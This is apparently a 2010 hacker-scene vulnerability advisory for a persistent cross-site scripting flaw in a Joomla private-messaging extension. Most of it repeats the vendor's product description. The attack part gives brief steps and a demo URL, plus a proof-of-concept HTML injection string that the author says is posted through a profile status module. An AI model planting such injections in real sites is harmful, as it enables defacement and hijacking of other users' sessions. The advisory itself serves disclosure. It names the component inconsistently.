46 lines
No EOL
2.3 KiB
Text
46 lines
No EOL
2.3 KiB
Text
Date : june, 18 2010
|
||
Vendor url :http://www.axxis.gr/
|
||
Critical Level : HIGH
|
||
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
||
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
|
||
greetz to :All ICW members and my friends :) luv y0 guyz
|
||
#######################################################################################################
|
||
Description:
|
||
Super Messenger allows users of your community to send Private Messages to each other similar to the Facebook concept.
|
||
Super Messenger is a powerful PMS, which gives the ability to your users to send HTML messages, embed images, videos, and even flash movies
|
||
|
||
to your messages!
|
||
Yet it is simple and easy-to-use, with an intuitive and user-friendly interface, based on the success-proven concept of Facebook's messaging.
|
||
It is a stand-alone application, but also integrates seamlessly with Community Builder, JomSocial, SuperGroups, SuperEvents, PUArcade,
|
||
|
||
Fireboard, SimGallery, and Kunena.
|
||
Especially Community Builder users will benefit greatly from the thoughtful cb-login module, the CB Super Messenger tab, and the Connections
|
||
|
||
messaging features.
|
||
When viewing a profile, users will be able to send a private message without the need to redirect to a new page!
|
||
SuperGroups users will be able to send private messages straight from the groups to other group members, and will love the additional
|
||
|
||
features and functionality of Super Messenger, which will also display all group messages in the Inbox and Outbox, with the corresponding
|
||
|
||
group name, linking back to the group's page!
|
||
|
||
#######################################################################################################
|
||
com_joomdocs suffers from persistent xss Vulnerability
|
||
|
||
Xploit:Persistent xss Vulnerability
|
||
|
||
Step 1 : As always register as a user :P
|
||
|
||
Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:"
|
||
|
||
INsert your evil XSS script or xss shell ;) and voila
|
||
|
||
DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1
|
||
|
||
">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> is posted in the What's on your mind PRO module :)
|
||
|
||
|
||
|
||
###############################################################################################################
|
||
# 0day no more
|
||
# Sid3^effects |